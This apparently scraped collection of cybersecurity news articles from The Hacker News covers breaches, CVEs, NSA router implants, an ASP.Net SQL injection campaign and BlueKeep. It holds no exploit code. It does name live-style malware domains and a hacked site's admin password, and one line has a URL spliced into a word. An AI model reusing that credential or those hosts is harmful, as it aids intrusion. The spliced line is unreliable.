Ashampoo warns customers about targeted attacks that might result from this incident. It gives a recent example where hackers broke into the email systems of PurelyGadgets and sent fake confirmation orders in the company's name. The rogue emails distributed PDF documents rigged with an exploit.
""If you for example receive a confirmation of an order from PurelyGadgets or another company without having made an appropriate purchase there, please do not open the attachment and delete the e-mail immediately,"" Mr. Hilchner advises.
Web Application Security : PHP SuperGlobal Variables are vulnerable to Hackers,https://thehackernews.com/2013/09/thanks-to-php-superglobal-80-websites.html,"Hackers are focusing on vulnerabilities in the PHP web application development platform threatening 80% websites in the world, including many big website i.e. Facebook and Wikipedia. PHP has several predefined variables that are called SuperGlobals i.e. POST, GET, COOKIES, FILES etc.
Imperva Releases Hacker Intelligence Initiative Report, particularly concerned about two vulnerabilities that can be used to execute code on servers running PHP and fail to stop PHP SuperGlobal parameter variables being modified by external sources.
Dubbed as CVE-2011-2505, describes a vulnerability in the authentication feature in PhpMyAdmin (PMA) that enables attackers to modify the _SESSION SuperGlobal variable.
CVE-2010-3065 describes a problem in the PHP's session serialization mechanism. By injecting malicious value into an internal variable using PHP's Superglobal mechanism, the attacker is able to change the application flow and execute arbitrary commands to take control over the server.
""Because compromised hosts can be used as botnet slaves to attack other servers, exploits against PHP applications can affect the general security and health of the entire web,""
Vulnerability is particularly dangerous due to the common use of PHP and could be used by hackers for a variety of purposes. ""The effects of these attacks can be great, as the PHP platform is by far the most popular Web application development platform, powering more than 80% of all Web sites, including Facebook and Wikipedia. Clearly, it is time for the security community to devote more attention to this issue.""
They note that PHP applications do not protect against the modification of variables from external sources, such as query parameters or cookies.
The attacker can combine the two separate vulnerabilities to extend the scope of the flaws. ""Based on the captured malicious traffic, we were able to trace its origin and find the specific exploit code used to generate it in a hacker forum on the web.""
Imperva's research team noted an average of 144 attacks per application that contained attack vectors related to SuperGlobal parameters, for the purpose of remote code execution, remote file inclusion and security filter evasion attacks.
PF Chang's China Bistro Confirms Credit and Debit Card Breach,https://thehackernews.com/2014/06/pf-changs-china-bistro-confirms-credit.html,"Following the massive data breaches at eBay, Neiman Marcus Group and Michaels Stores, yet another private equity company Centerbridge Partners-backed restaurant chain P.F. Chang's China Bistro suffered a potential Credit and Debit card data breach.
The Asian-themed casual dining restaurant chain confirmed on Thursday their customers' Credit and Debit card information were stolen in the cyber attack on its restaurants, saying it is temporarily switching to a manual Credit and Debit card imprinting system for all of its P.F. Chang's China Bistro branded restaurants located in the United States, in order to process cards safety.
""At P.F. Chang's, the safety and security of our guests' payment information is a top priority,"" said Rick Federico, CEO of P.F. Chang's. ""Therefore, we have moved to a manual credit card imprinting system for all P.F. Chang's China Bistro branded restaurants located in the continental United States. This ensures our guests can still use their credit and debit cards safely in our restaurants as our investigation continues.""
P.F. Chang's released a statement saying that the restaurant chain was first alerted on Tuesday about the data breach by the United States Secret Service, which is investigating the matter along with a team of third-party forensics experts to understand the nature and scope of the incident.
""On Tuesday, June 10, P.F. Chang's learned of a security compromise that involves credit and debit card data reportedly stolen from some of our restaurants. Immediately, we initiated an investigation with the United States Secret Service and a team of third-party forensics experts to understand the nature and scope of the incident, and while the investigation is still ongoing, we have concluded that data has been compromised,"" reads the statement.
Till now, the company didn't know how many customers were affected in the data breach but it assured that company is working with the credit and debit card companies to identify those cards at risk.
The company also advised its customers to monitor their bank statements for any type of fraudulent activity. In addition, the company have also established a dedicated public website, pfchangs.com/security, for their customers to receive queries and answers it.
NSA Reportedly Intercepts US-made Internet Routers to Install Spyware,https://thehackernews.com/2014/05/nsa-reportedly-intercepts-us-made.html,"The US Intelligence Agency, NSA has been reportedly intercepting and accessing routers, servers, and other computer networking hardware to plant data gathering ""backdoors"" and other spywares before they are exported and delivered to the international customers, reported by the Guardian.
Yesterday in a published excerpt of his forthcoming book, ""No Place to Hide"", Journalist Glenn Greenwald underlines the interest of National Security Agency in planting backdoors in U.S. suppliers' routers and other networking devices in order to carry out its massive surveillance program.
""A June 2010 report from the head of the NSA's Access and Target Development department is shockingly explicit,"" Greenwald said. ""The NSA routinely receives — or intercepts — routers, servers and other computer network devices being exported from the US before they are delivered.""
While US government is always prohibiting the purchase of Huawei products due to suspected backdoors from the Chinese government, however the book written by Glenn Greenwald reads that the US government does the same thing with US suppliers' hardware and repackages them with a factory seal before supplying them to overseas nations.
As Greenwald notes in the excerpt, ""It is quite possible that Chinese firms are implanting surveillance mechanisms in their network devices. But the US is certainly doing the same.""
""The agency then implants backdoor surveillance tools, repackages the devices with a factory seal, and sends them on. The NSA thus gains access to entire networks and all their users. The document gleefully observes that some 'SIGINT tradecraft…is very hands-on (literally!)',"" Greenwald writes.
According to Greenwald, the document of this new revelation is going to release today. His new book is based upon the leaked documents from 2010 provided by the former NSA contractor Edward Snowden that detailed the NSA receiving or intercepting various devices in the US before exporting them to foreign countries, which he apparently obtained from Snowden.
Image Credit: Arstechnica
So far, The US National Security Agency (NSA) has been working with the security firm RSA on planting backdoors to spy on people, but if these allegations by Greenwald are correct, it's all clear that all manner of US companies must be complicity involved with the agency.
By planting backdoors surveillance systems in the equipments, the NSA could feasibly gain access to the vast networks and users.
""In one recent case, after several months a beacon implanted through supply-chain interdiction called back to the NSA covert infrastructure,"" the NSA report says, according to the Guardian. ""This callback provided us access to further exploit the device and survey the network.""
It's not first time the NSA has been accused of this type of allegation. Also a report from German newspaper Der Spiegel alleged that the US intelligence agency intercepts the shipping deliveries to plant back doors in electronic equipments in order to gain remote access of the systems, including computers' hard drives, routers, and other devices from companies such as Cisco, Dell, Western Digital, Seagate, Maxtor, Samsung, and Huawei.
THN Weekly Roundup — 10 Most Important Stories You Shouldn't Miss,https://thehackernews.com/2017/07/hacker-news-cybersecurity.html,"Here we are with our weekly roundup, briefing this week's top cyber security threats, incidents and challenges.
This week has been very short with big news from shutting down of two of the largest Dark Web marketplaces and theft of millions of dollars in the popular Ethereum cryptocurrency to the discovery of new Linux malware leveraging SambaCry exploit.
We are here with the outline of this week's stories, just in case you missed any of them. We recommend you read the entire thing (just click 'Read More' because there's some valuable advice in there as well).
Here's the list of this Week's Top Stories:
1. Feds Shuts Down AlphaBay and Hansa Dark Web Markets — Dream Market Under Suspicion
On Thursday, Europol announced that the authorities had shut down two of the largest criminal Dark Web markets — AlphaBay and Hansa — in what's being called the largest-ever international operation against the dark web's black market conducted by the FBI, DEA and Dutch National Police.
Interestingly, the federal authorities shut down AlphaBay, but before taking down Hansa market, they took control of the Dark Web market and kept it running for at least a month in an effort to monitor the activities of its visitors, including a massive flood of Alphabay refugees.
After the shutdown of both AlphaBay and Hansa, Dream Market has emerged as the leading player, which has been in business since 2013, but it has now been speculated by many dark web users that Dream Market is also under police control.
For detailed information — Read more.
2. New Ransomware Threatens to Send Your Internet History to All Your Friends
After WannaCry and Petya ransomware outbreaks, a new strain of ransomware has been making the rounds on the Google Play Store in bogus apps, which targets Android mobile phone users.
Dubbed LeakerLocker, instead of encrypting files on your device, this Android ransomware secretly collects personal images, messages and browsing history and then threatens to share them with your contacts if you don't pay $50 (£38).
For more detailed information on the LeakerLocker ransomware — Read more.
3. New CIA Leaks — Smartphone Hacking and Malware Development
WikiLeaks last week published the 16th batch of its ongoing Vault 7 leak, revealing the CIA's Highrise Project that allowed the spying agency to stealthy collect and forwards stolen data from compromised smartphones to its server through SMS messages.
This week, the whistleblowing organisation revealed about a CIA contractor — Raytheon Blackbird Technologies — who was responsible for analysing advanced malware and hacking techniques being used in the wild by cyber criminals.
For more detailed information on Highrise Project and its contractor Raytheon Blackbird Technologies — Read More.
4. Three Back-to-Back Multi-Million Dollar Ethereum Heist in 20 Days
This week, an unknown hacker stole nearly $32 Million worth of Ethereum – one of the most popular and increasingly valuable cryptocurrencies – from wallet accounts linked to at least three companies by exploiting a critical vulnerability in Parity's Ethereum Wallet software.
This was the third Ethereum cryptocurrency heist that came out two days after an alleged hacker stole $7.4 Million worth of Ether from trading platform CoinDash and two weeks after someone hacked into South Korean cryptocurrency exchange and stole more than $1 Million in Ether and Bitcoins from user accounts.
For more detailed information about the Ethereum Heist — Read More.
5. Critical Gnome Flaw Leaves Linux PCs Vulnerable
This week has been bad for Linux users as well. A security researcher discovered a code injection vulnerability in the thumbnail handler component of GNOME Files file manager that allowed hackers to execute malicious code on targeted Linux machines.
German researcher Nils Dagsson Moskopp dubbed the vulnerability Bad Taste (CVE-2017-11421) and also released proof-of-concept (PoC) code on his blog to demonstrate the vulnerability.
For more details about the Bad Taste vulnerability and its PoC — Read More.
6. New Malware Exploits SambaCry to Hijack NAS Devices
Despite being patched in late May, the SambaCry vulnerability is currently being leveraged by a new piece of malware to target the Internet of Things (IoT) devices, particularly Network Attached Storage (NAS) appliances.
SambaCry is a 7-year-old critical remote code execution (RCE) vulnerability (CVE-2017-7494) in Samba networking software that could allow a hacker to remotely take full control of a vulnerable Linux and Unix machines.
The flaw was discovered and patched two months ago, but researchers at Trend Micro warned that the flaw had been actively exploited by the SHELLBIND malware that mostly targets NAS devices used by small and medium-size businesses.
For more detailed information on the SHELLBIND malware — Read More.
7. Devil's Ivy — Millions of Internet-Connected Devices At Risk
This week, researchers at the IoT-focused security firm Senrio discovered a critical remotely exploitable vulnerability in an open-source software development library used by major IoT manufacturers that eventually left millions of smart devices vulnerable to hacking.
Dubbed Devil's Ivy, the vulnerability (CVE-2017-9765) in the gSOAP toolkit (Simple Object Access Protocol) — an advanced C/C++ auto-coding tool for developing XML Web services and XML application.
The researchers also released proof-of-concept (PoC) video demonstrating the RCE on a security camera manufactured by Axis Communications.
For more detailed information on the Devil's Ivy and PoC video — Read More.
8. ""Ubuntu Linux for Windows 10 Released"" — Sounds So Weird?
Downloading an entire operating system has just become as easy as downloading an application for Windows 10 users, as Microsoft last week announced the availability of popular Linux distro 'Ubuntu' in the Windows App Store.
While the company announced its plans to launch Fedora and SUSE Linux as well on Windows Store, the company did not reveal exactly when its users can expect to see these two flavours of Linux distro on the App Store.
For detailed information on how to install and run Ubuntu on Windows 10 — Read More.
9. Over 70,000 Memcached Servers Vulnerable to Hacking
It's been almost eight months since the Memcached developers have patched several critical remote code execution (RCE) vulnerabilities in the software, but tens of thousands of servers running Memcached application are still vulnerable.
Cisco's Talos intelligence and research group last year discovered three critical RCE vulnerabilities in Memcached — a moderhttps://thehackernews.com/2017/07/segway-hoverboard-hacking.htmln open-source and easily deployable distributed caching system that allows objects to be stored in memory.
The vulnerability exposed major websites including Facebook, Twitter, YouTube, Reddit, to hackers, but the team of researchers scanned the internet on two different occasions and found that over 70,000 servers are still vulnerable to the attacks, including ransomware attacks similar to the one that hit MongoDB databases in late December.
For more in-depth information on the Memcached vulnerabilities — Read More.
10. Tor Launches Bug Bounty Program for Public
After its intention to launch a public bug bounty program in late December 2015, the Tor Project has finally launched a ""Bug Bounty Program,"" encouraging hackers and security researchers to find and privately report bugs that could compromise the anonymity network.
The bug bounty reports will be sent through HackerOne — a startup that operates bug bounty programs for companies including Yahoo, Twitter, Slack, Dropbox, Uber, General Motors – and even the U.S. Department of Defense for Hack the Pentagon initiative.
For detailed information on bug bounty prices and types of valid vulnerabilities — Read More.
Other Important News This Week
Besides these, there were lots of incidents happened this week, including:
Microsoft's smart move to help take down cyber espionage campaigns conducted by ""Fancy Bear"" hacking group.
A new credential stealing malware found being sold for as cheap as $7 on underground forums.
Cisco patched a highly critical RCE vulnerability in its WebEx browser extension for Chrome and Firefox, which could allow attackers to execute malicious code on a victim's computer remotely.
Windows 10 now let you Reset forgotten password directly from your computer's Lock Screen.
Several critical vulnerabilities in Segway Ninebot miniPRO could allow hackers to remotely take ""full control"" over the hoverboard within range and leave riders out-of-control.
Ashley Madison's parent company Ruby Corp has agreed to pay a total of $11.2 Million to roughly 37 million users whose personal details were exposed in a massive data breach two years ago.
Million ASP.Net web sites affected with mass SQL injection attack,https://thehackernews.com/2011/10/million-aspnet-web-sites-affected-with.html,"Million ASP.Net web sites affected with mass SQL injection attack
Hackers are in the midst of a massively successful SQL injection attack targeting websites built on Microsoft's ASP.Net platform. About 180,000 pages have been affected so far, security researchers say.
Attackers have planted malicious JavaScript on ASP.Net sites that causes the browser to load an iframe with one of two remote sites: www3.strongdefenseiz.in and www2.safetosecurity.rr.nu, according to security researchers at Armorize who discovered the attack. From there, the iframe attempts to plant malware on the visitor's PC via a number of browser drive-by exploits.
A drive-by exploit will load malware without a visitor's knowledge or participation (no need to open a file or click on a link). Fortunately, the attackers are using known exploits, with patches available, so the attack can only be successful if a visitor is using an outdated, unpatched browser without the latest version of Adobe PDF or Adobe Flash or Java.
Unfortunately, Armorize says that only a few of the most popular antivirus vendors can detect the dropped malware, according to the Virustotal web site. Virtustotal is a security monitoring service offered by Hispasec Sistemas that analyzes suspicious files and URLs. At this time, it says that six antivirus packages out of the 43 it monitors can detect this latest SQL injection attack.
These are AntiVir, ByteHero, Fortinet, Jiangmin, McAfee and McAfee-GW-Edition.The attack is targeting users whose default browser language is English, French, German, Italian, Polish or Breton. One of the sites accessed via the iframe is in Russia, the other is in the United States and is hosted by HostForWeb.com, Armorize says. Some of the planted malware accesses a site hosted in the United States, too.
Users are advised to take advantage of NoScript in order to protect themselves from this, and many other Web based threats.
ARMY : USB Drive responsible for over 70 percent of Cyber Security Breaches,https://thehackernews.com/2012/10/army-usb-drive-responsible-for-over-70.html,"A ban on the use of pen drives has not been able to safeguard cyber security as it has now been labeled as a major threat in defence forces, the Army officials said. The use of pen drives as an easy-to-carry storage device has increased in the recent past and internal reports have confirmed that over 70 percent cyber security breaches in the armed forces are due to their unauthorised use
""These pen drives, which are mostly manufactured in China, have emerged as a big threat to our cyber security systems,"" they said.
Generally it is found that officials use pen drive to store official data for use at their personal computers but from there, it is transmitted from their IP addresses to hackers from the 'malware' present in the pen drives. About a couple of years ago, a Major posted in Andaman and Nicobar Islands was apprehended as it was found that sensitive data was being transferred from his computer.
However, it later emerged that his system had been hacked and spying viruses were transferring information to other computers. Measures have been taken by the other two services also to tighten their cyber security as IAF (Indian Air Force) also recently issued instructions to its personnel warning them against having any official data on their personal computers and pen drives.
Anybody found violating these instructions in checks by cyber security personnel will draw strict action which may even amount to disciplinary action including court martial, they said.
"Harvard Carr Center for Human Rights Policy Hacked, Password was ""DOG"" ?",https://thehackernews.com/2012/10/harvard-carr-center-for-human-rights.html,"Harvard's Carr Center for Human Rights Policy website (www.hks.harvard.edu/cchrp/) was hacked last week and then silently fixed by the administrator without giving Reply/Credit to the Whitehat Hacker who reported the vulnerability. The Hack incident was performed in 3 Phases as described below:
Phase 1: A Hacker , with nickname ""FastFive"" posted a few sql injection vulnerable Educational sites on a famous Hacking Forum last week which included the SQLi vulnerable link for the Harvard Carr Center for Human Rights Policy website, as you can see in the list in the above screenshot taken by me.
Phase 2: Almost 100's of Hackers have seen the post from ""FastFive"" and they got some juicy information for their next targets. One of them named, ""Vansh"" successfully exploit the Harvard's site and extracted the database onto his computer. He Found the username and Password from the table and tried to login on the Admin access panel location. Yes, he was logged in with password ""DOG"". We have confirmed the User:Password validity before posting this news and below is the screenshot posted by the Hackers. For security reasons we are not disclosing any databases or usernames, but why are we disclosing the password ? It's because, using a three character password by the administration of one of the biggest universities makes me do so. I think even a brute force tool will take half second to crack such a weak password.
Phase 3: Because Vansh is a Whitehat hacker he decided to inform the Administrator without disclosing the Hack in public before the patch. He mailed the admins and was waiting for the reply from the last 2-3 Days. But today he saw that they fixed the vulnerability in the site silently without giving credit or a simple Thank you reply to this Hacker who informed them and revoked the access to all external IP's.
So, finally this NO REPLY made him inform The Hacker News and We educate you that Never use ""DOG"" as your Password. Happy Hunting !
REMnux: A Linux Distribution for Reverse-Engineering Malware,https://thehackernews.com/2011/10/remnux-linux-distribution-for-reverse.html,"REMnux: A Linux Distribution for Reverse-Engineering Malware
REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and is maintained by Lenny Zeltser.
REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.
REMnux is also useful for analyzing web-based malware, such as malicious JavaScript, Java programs, and Flash files. It also has tools for analyzing malicious documents, such as Microsoft Office and Adobe PDF files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly on the REMnux system without requiring other systems to be present in the lab.
Downloading REMnux
VMware virtual appliance archive
ISO image of a Live CD
McAfee DeepSAFE - Anti-rootkit Security Solution,https://thehackernews.com/2011/09/mcafee-deepsafe-anti-rootkit-security.html,"McAfee DeepSAFE - Anti-rootkit Security Solution
McAfee previewed its DeepSAFE hardware-assisted security technology for proactively detecting and preventing stealthy advanced persistent threats (APTs) and malware. The technology, which was co-developed with Intel, sits below the OS, providing the ability to fundamentally change the security game, according to the companies.
According to McAfee Labs, more than 1,200 new rootkits per day are detected - equating to 50 per hour every single day. The DeepSAFE technology, which was demonstrated at the Intel Developer Forum in San Francisco, was able to detect and stop a zero-day Agony rootkit from infecting a system in real time. This technology is expected to launch in products later in 2011.
Key attributes of McAfee DeepSAFE:
Builds the foundation for next-generation hardware-assisted security operating beyond the operating system
Provides a trusted view of system events below the operating system
Exposes many attacks that are undetectable today
New vantage point to block sophisticated stealth techniques and APTs
Provides real time CPU event monitoring with minimal performance impact
Combines the power of hardware and flexibility of software to deliver a new foundation for security.
""Intel and McAfee are working on joint technologies to better protect every segment across the compute continuum from PCs to devices,"" said Renée James, senior vice president and general manager of the Software and Services Group at Intel and the Chairman of McAfee. ""By combining the features of existing Intel hardware and innovations in security software, Intel and McAfee are driving innovation in the security industry by providing a new way to protect computing devices. We are truly excited to introduce this technology upon which we will deliver new solutions.""
T-Mobile Suffers Data Breach Affecting Prepaid Wireless Customers,https://thehackernews.com/2019/11/t-mobile-prepaid-data-breach.html,"Are you a T-Mobile prepaid customer? If yes, you should immediately create or update your associated account PIN/passcode as additional protection.
The US-based telecom giant T-Mobile today disclosed a yet another data breach incident that recently exposed potentially personal information of some of the customers using its prepaid services.
What happened? In a statement posted on its website, T-Mobile said its cybersecurity team discovered a ""malicious, unauthorized access"" to information associated with an undisclosed number of its prepaid wireless account customers.
However, the company did not disclose precisely how the breach happened, when it happened, and how the attackers unauthorizedly managed to access the private information of the company's prepaid customers.
What type of information was accessed? The stolen data associated with customers' prepaid wireless accounts include their:
phone numbers,
billing addresses (if customers provided this data during account establishment),
account numbers, and
rate plans and features, like whether a customer has added an international calling feature.
""Rate plan and features of your voice calling service are 'customer proprietary network information' ('CPNI') under FCC rules, which require we provide you notice of this incident,"" T-Mobile said.
What type of information was not compromised? The telecommunication giant confirmed that no financial information, social security numbers, and passwords were compromised as a result of the security breach incident.
What is T-Mobile now doing? The company took necessary steps to shut down the unauthorized access upon discovery and immediately notified law enforcement of the security incident.
The company is also notifying affected customers through email and directing them to a customer support page on T-Mobile's website.
T-Mobile also made it clear that if you don't receive an email notification from the company, it's likely your account was not among those impacted by this incident, but ""it is possible you didn't hear from [the company] because [it] doesn't have up-to-date contact information for you.""
""We are always working to improve security so we can stay ahead of malicious activity and protect our customers. We have a number of safeguards in place to protect your personal information from unauthorized access, use, or disclosure,"" T-Mobile said.
What Should You Do Now? Affected customers are recommended to update the PIN/passcode to access their accounts.
Do it even if you are not affected—just to be on the safer side.
Affected customers should also be suspicious of phishing emails, which are usually the next step of cybercriminals in an attempt to trick users into giving away their passwords and credit card information.
Although the T-Mobile data breach incident did not expose any financial information, it is always a good idea to keep a close eye on your bank and payment card statements for any unusual activity and report to the bank if you find any.
The incident comes over a year after T-Mobile suffered a significant data breach that exposed names, email addresses, phone numbers, and account information for about 2 million customers.
New 0-Day Flaw Affecting Most Android Phones Being Exploited in the Wild,https://thehackernews.com/2019/10/android-kernel-vulnerability.html,"Another day, another revelation of a critical unpatched zero-day vulnerability, this time in the world's most widely used mobile operating system, Android.
What's more? The Android zero-day vulnerability has also been found to be exploited in the wild by the Israeli surveillance vendor NSO Group—infamous for selling zero-day exploits to governments—or one of its customers, to gain control of their targets' Android devices.
Discovered by Project Zero researcher Maddie Stone, the details and a proof-of-concept exploit for the high-severity security vulnerability, tracked as CVE-2019-2215, has been made public today—just seven days after reporting it to the Android security team.
The zero-day is a use-after-free vulnerability in the Android kernel's binder driver that can allow a local privileged attacker or an app to escalate their privileges to gain root access to a vulnerable device and potentially take full remote control of the device.
Vulnerable Android Devices
The vulnerability resides in versions of Android kernel released before April last year, a patch for which was included in the 4.14 LTS Linux kernel released in December 2017 but was only incorporated in AOSP Android kernel versions 3.18, 4.4 and 4.9.
Therefore, most Android devices manufactured and sold by a majority of vendors with the unpatched kernel are still vulnerable to this vulnerability even after having the latest Android updates, including below-listed popular smartphone models :
Pixel 1
Pixel 1 XL
Pixel 2
Pixel 2 XL
Huawei P20
Xiaomi Redmi 5A
Xiaomi Redmi Note 5
Xiaomi A1
Oppo A3
Moto Z3
Oreo LG phones
Samsung S7
Samsung S8
Samsung S9
To be noted, Pixel 3, 3 XL, and 3a devices running the latest Android kernels are not vulnerable to the issue.
Android Flaw Can Be Exploited Remotely
According to the researcher, since the issue is ""accessible from inside the Chrome sandbox,"" the Android kernel zero-day vulnerability can also be exploited remotely by combining it with a separate Chrome rendering flaw.
""The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the Web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox,"" Stone says in the Chromium blog.
""I've attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when running locally. It only requires the untrusted app code execution to exploit CVE-2019-2215. I've also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019.""
Patches to be Made Available Soon
Though Google will release a patch for this vulnerability in its October's Android Security Bulletin in the coming days and also notified OEMs, most affected devices would not likely receive the patch immediately, unlike Google Pixel 1 and 2.
""This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,"" the Android security team said in a statement.
""We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.""
Google's Project Zero division usually gives software developers a 90-day deadline to fix the issue in their affected products before going public with the details and PoC exploits, but in case of active exploits, the team goes public after seven days of privately being reported.
What's your take? Although this vulnerability is severe and can be used to gain root access to an Android device, users need not worry that much as the exploitation of such issues is mostly limited to targeted attack scenarios.
Nevertheless, it's always a good idea to avoid downloading and installing apps from third-party app stores and any unnecessary apps, even from the Google Play Store.
European Parliament Proposes Ban On Encryption Backdoors,https://thehackernews.com/2017/06/encryption-backdoor.html,"Prime Minister Theresa May wants tech companies, like Facebook, Apple, and Google, to create controversial 'backdoors' for police, but even somewhere she knows that it's not that easy as it sounds.
The Civil Liberties, Justice and Home Affairs Committee of the European Parliament has released a draft proposal [PDF] for new laws on privacy and electronic communications, recommending end-to-end (E2E) encryption on all communications and forbidding backdoors that offer access to law enforcement.
""The protection of confidentiality of communications is also an essential condition for the respect of other related fundamental rights and freedoms, such as the protection of freedom of thought, conscience and religion, and freedom of expression and information,"" the draft reads.
Draft Says, Your Security is Our Top Priority
According to the draft, EU citizens need more protection, not less and they need to know that the ""confidentiality and safety"" of their data is ""guaranteed,"" but software backdoors risk ""weakening"" that privacy.
What is backdoor? By definition, ""Backdoor is a feature or defect of a computer system that allows surreptitious unauthorized access to data.""
Many countries' government, including the US Defence Department, have forced major companies to provide backdoor access to their services, allowing the feds to intercept users' traffic and access everything from secure messages to their web activities.
But, ""Technically, there is no such backdoor that only the government can access. If surveillance tools can exploit the vulnerability by design, then an attacker who gained access to it would enjoy the same privilege.""
Draft Demands End-to-End Encryption & Ban On Backdoors
The proposed draft recommends the use of end-to-end encryption that would make it more difficult for federal officials to request data from tech companies.
The proposal would ban decryption of user data as well as the creation of backdoors in software or encryption technologies that could allow government access to users' private information.
So if the amendments pass, the ban on software backdoors would make it difficult for the government to enforce the Section 49 of the Regulation of Investigatory Powers Act (RIPA) 2000's requirement that companies remove ""electronic protection"" when possible.
For those unaware, end-to-end encryption is a secure communication that encrypts data on the sender's system before passing it to a company's server. The company then passes the encrypted data to the intended recipient, who is the only person who can decrypt it.
Nobody in between, be it an application service provider, an Internet service provider (ISP), hacker, or even law enforcement officials, can read or tamper with the data.
""When encryption of electronic communications data is used, decryption, reverse engineering or monitoring of such communications shall be prohibited,"" the draft reads.
""Member States shall not impose any obligations on electronic communications service providers that would result in the weakening of the security and encryption of their networks and services.""
Securing the 'Internet of Things'
Similarly, the draft also says, the current law have not kept pace with how the machine-to-machine communications in the Internet of Things can expose citizens.
The connected devices and machines are increasingly communicating with each other today by using electronic communications networks.
So, according to the committee, this Regulation should also be applied to the machine-to-machine communications in order to ""ensure full protection of the rights to privacy and confidentiality of communications, and to promote a trusted and secure Internet of Things in the digital single market.""
In short, the committee wants that any future means of communication, such as ""calls, internet access, instant messaging applications, email, internet phone calls and messaging provided through social media"" are all protected from hackers, government and prying eyes.
The committee wants that applications, browsers, internet service providers, cars, smartphones or fitness trackers should also respect no-track requests from their customers, and snoop their data only after getting users' consent.
However, it should be noted that most technology companies fall under the United States court of law, and post-Snowden era proves that as long as your countries' data is stored out of your boundaries, your policies and regulations would hardly make any difference.
"Book Review: Hacking Point of Sale, In-Depth Study on Payment Applications",https://thehackernews.com/2014/05/book-review-hacking-point-of-sale-in.html,"Point-of-sale (POS) is the hottest topic in payment structures and its one of the most popular technology topics as well. A Point-of-sale (POS) machine is a computerized replacement for a cash register. It has ability to quickly process a customer's transaction, accurately keep the records, process credit and debit cards, connect to other systems in a network, and manage inventory.
A basic POS system would consist of a computer as its core part provided with application specific programs for the particular environment in which it will serve, along with a cash drawer, barcode scanner, receipt printer and the appropriate POS software. Point-of-sale (POS) terminals are used in most industries that have a point of sale such as a service desk, including restaurants, lodging, entertainment, and museums.
Due to the better track inventory and accuracy of records, the Point-of-sale (POS) machine is used worldwide and it can be easily set-up, depending on the nature of the business. But on the other hand, Point-of-sale (POS) systems are critical components in any retail environment and the users are not aware of the emerging threats it poses in near future.
Last week I read an excellent book entitled 'HACKING POINT OF SALE', written by Slava Gomzine, that summarizes, systemizes, and shares knowledge about payment application security.
In the Book, the author covers all the aspects of card payment processing from the security point of view that mainly depends on confidentiality, integrity, and availability.
In past few months, we have seen many massive data breaches targeting POS machines and the largest one is TARGET data breach occurred during the last Christmas holidays. The third-largest U.S. Retailer in which over 40 million Credit & Debit cards were stolen, used to pay for purchases at its 1500 stores nationwide in the U.S.
Not Target alone, multiple retailers including Neiman Marcus, Michaels Store were also targeted involving the heist of possibly 110 million Credit-Debit cards, and personal information.
Later, Target and other retailers confirmed that a malware was embedded in point-of-sale (POS) equipment at its checkout counters to collect secure data as the credit cards were swiped during transactions. That means the main theft resides in the company's POS system.
The Book 'Hacking Point of Sale: Payment Application Secrets, Threats, and Solutions' is all about the In-Depth technical information of attacks and vulnerabilities in Point-of-sale (POS) system, along with the extensive knowledge about the mitigation and protection measures.
Technological overview of Electronic payment systems
POS applications architecture
Communication protocols
Attacks on Point-of-sale Systems
Step-by-step explanation of credit card fraud processes
POS payment application vulnerabilities and non-software attacks
Weak Encryption mechanisms and Poor key management
How to prevent attacks on payment applications using Cryptography
How to Protect the cardholders' sensitive information
How to protect the application itself by utilizing client and server certificates, digital signatures, and code obfuscation.
From a security perspective, the most critical risk lies in the payment process, because if the information that the customers hand over is captured somehow, the cyber criminals can use it to commit credit card frauds.
Also, many point-of-sale (POS) terminals are built using embedded versions of Microsoft Windows, which means that it is trivial for an attacker to create and develop malware that would run on a POS terminal.
Attackers can also steal the information by leveraging the weakness in the point-of-sale (POS) environment such as unprotected memory, unencrypted network transmission, poorly encrypted disk storage, card reader interface, or compromised pinpad device.
There are more than a billion active credit and debit card users in US alone, thus an active target for money motivated hackers. If we look at the figures, in 2011, POS terminals and payment card information was involved in almost 48% of security breaches which is more than any other data type breach.
Due to lack of concern and security measures, point-of-sale (POS) systems have become an attractive target for cybercriminals and to overcome the upcoming threats we should know its architecture, the areas of attacks and the defense measures.
Either you are a Developer, Security Architect , QA Analyst, Security Researcher or a Hacker, this book is really for you to grab the in-depth research of the point-of-sale (POS) systems, how it works, how it could be exploited, and what protection measures should be taken.
The Publisher 'Wiley' is offering a special 50% Discount on 'Hacking Point of Sale' book only for 'The Hacker News' readers, so get your copy today. Stay Tuned!
"Nearly 1 Million Computers Still Vulnerable to ""Wormable"" BlueKeep RDP Flaw",https://thehackernews.com/2019/05/bluekeep-rdp-vulnerability.html,"Nearly 1 million Windows systems are still unpatched and have been found vulnerable to a recently disclosed critical, wormable, remote code execution vulnerability in the Windows Remote Desktop Protocol (RDP)—two weeks after Microsoft releases the security patch.
If exploited, the vulnerability could allow an attacker to easily cause havoc around the world, potentially much worse than what WannaCry and NotPetya like wormable attacks did in 2017.
Dubbed BlueKeep and tracked as CVE-2019-0708, the vulnerability affects Windows 2003, XP, Windows 7, Windows Server 2008 and 2008 R2 editions and could spread automatically on unprotected systems.
The vulnerability could allow an unauthenticated, remote attacker to execute arbitrary code and take control of a targeted computer just by sending specially crafted requests to the device's Remote Desktop Service (RDS) via the RDP—without requiring any interaction from a user.
Describing the BlueKeep vulnerability as being Wormable that could allow malware to propagate to vulnerable systems just like WannaCry, Microsoft released a security fix to address the vulnerability with its May 2019 Patch Tuesday updates.
However, the latest Internet scan performed by Robert Graham, head of offensive security research firm Errata Security, revealed that, unfortunately, roughly 950,000 publicly accessible machines on the Internet are vulnerable to the BlueKeep bug.
This clearly means that even after the security patch is out, not every user and organisation has deployed it to address the issue, posing a massive risk to individuals and organizations, including industrial and healthcare environments.
